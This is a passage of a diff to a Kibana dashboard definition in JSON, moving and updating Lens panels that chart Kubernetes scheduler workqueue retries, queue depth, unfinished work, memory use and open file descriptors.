"dataType": "number", - "isBucketed": false, - "label": "Rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.retries.count))", - "isFormulaBroken": false - }, - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.retries.count: *" - }, - "isBucketed": false, - "label": "Part of Rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.retries.count" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate", - "operationType": "counter_rate", - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "55eaa53f-a391-4996-9721-2f7af9aa963d", - "key": "kubernetes.scheduler.workqueue.retries.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.retries.count" - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + }, + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { + "dataType": "number", + "isBucketed": false, + "label": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "operationType": "formula", + 
"params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" - ], - "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "isFormulaBroken": false + }, + "references": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.unfinished.sec: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "695725fe-9d35-49c6-8289-21fbe54ff2a6", + "key": "kubernetes.scheduler.workqueue.unfinished.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.unfinished.sec" + } + } + } 
+ ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", + "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "gridData": { - "h": 14, - "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "w": 24, - "x": 24, - "y": 29 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "title": "Workqueue retries increase rate", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current unfinished work" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 57 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } }, - { - 
"embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": 
"a0716ae8-4157-473d-8eba-8ff6625fed4b", + "w": 24, + "x": 0, + "y": 60 + }, + "panelIndex": "a0716ae8-4157-473d-8eba-8ff6625fed4b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "36494898-fe02-477e-9364-d94ea0fcb947", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "type": "column" }, - { - "id": "metrics-*", - "name": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b80230c-9cc8-444f-b092-1fbc4d764992": { - "columnOrder": [ - "e7259e4c-0700-48a5-aeff-993fc075bcab", - "7b8d9b03-439b-4171-8b64-91b8664b4b94", - "725088f8-ac91-4df6-8863-f9abe7ad40cd", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "columns": { - "725088f8-ac91-4df6-8863-f9abe7ad40cd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Depth", - "operationType": "formula", - "params": { - "formula": 
"differences(average(kubernetes.scheduler.workqueue.depth.count, kql='kubernetes.scheduler.workqueue.depth.count: *'))", - "isFormulaBroken": false - }, - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.depth.count: *" - }, - "isBucketed": false, - "label": "Part of Depth", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.depth.count" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Depth", - "operationType": "differences", - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "scale": "ratio" - }, - "7b8d9b03-439b-4171-8b64-91b8664b4b94": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e7259e4c-0700-48a5-aeff-993fc075bcab": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Depth", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of kubernetes.scheduler.workqueue.depth.count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.depth.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": 
"kubernetes.scheduler.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "key": "kubernetes.scheduler.workqueue.depth.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.depth.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cd" - ], - "collapseFn": "", - "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", - "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yLeftExtent": { - "mode": "full" + "formula": "last_value(kubernetes.scheduler.process.memory.resident.bytes, kql='kubernetes.scheduler.process.memory.resident.bytes: *')", + "isFormulaBroken": false + }, + 
"references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.memory.resident.bytes: *" + }, + "isBucketed": false, + "label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + }, + "formula": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "yTitle": "" + 100 + ], + "location": { + "max": 114, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "3a26dffa-0696-485d-b991-1dbc5092082e", - "w": 24, - "x": 0, - "y": 43 - }, - "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", - "title": "Workqueue depth rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Virtual memory", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "695725fe-9d35-49c6-8289-21fbe54ff2a6", - "type": "index-pattern" - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + 
"disabled": false, + "index": "36494898-fe02-477e-9364-d94ea0fcb947", + "key": "kubernetes.scheduler.process.fds.open.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#D6BF57", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { - "columnOrder": [ - "73933c6b-b6da-45c6-a190-c501453f658f", - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" - ], - "columns": { - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "73933c6b-b6da-45c6-a190-c501453f658f": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.name + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of 
kubernetes.scheduler.workqueue.unfinished.sec", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { - "dataType": "number", - "isBucketed": false, - "label": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "isFormulaBroken": false - }, - "references": [ - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" - ], - "scale": "ratio" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.unfinished.sec: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#D6BF57", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + 
"type": "lens" + }, + "title": "Scheduler process data" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 60 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "695725fe-9d35-49c6-8289-21fbe54ff2a6", - "key": "kubernetes.scheduler.workqueue.unfinished.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.unfinished.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 
"7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", - "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "w": 24, - "x": 24, - "y": 43 - }, - "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "title": "Current unfinished work", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": "average(kubernetes.scheduler.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.scheduler.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": 
"6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.scheduler.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": 
{ + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 57 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "temperature", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 66 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": 
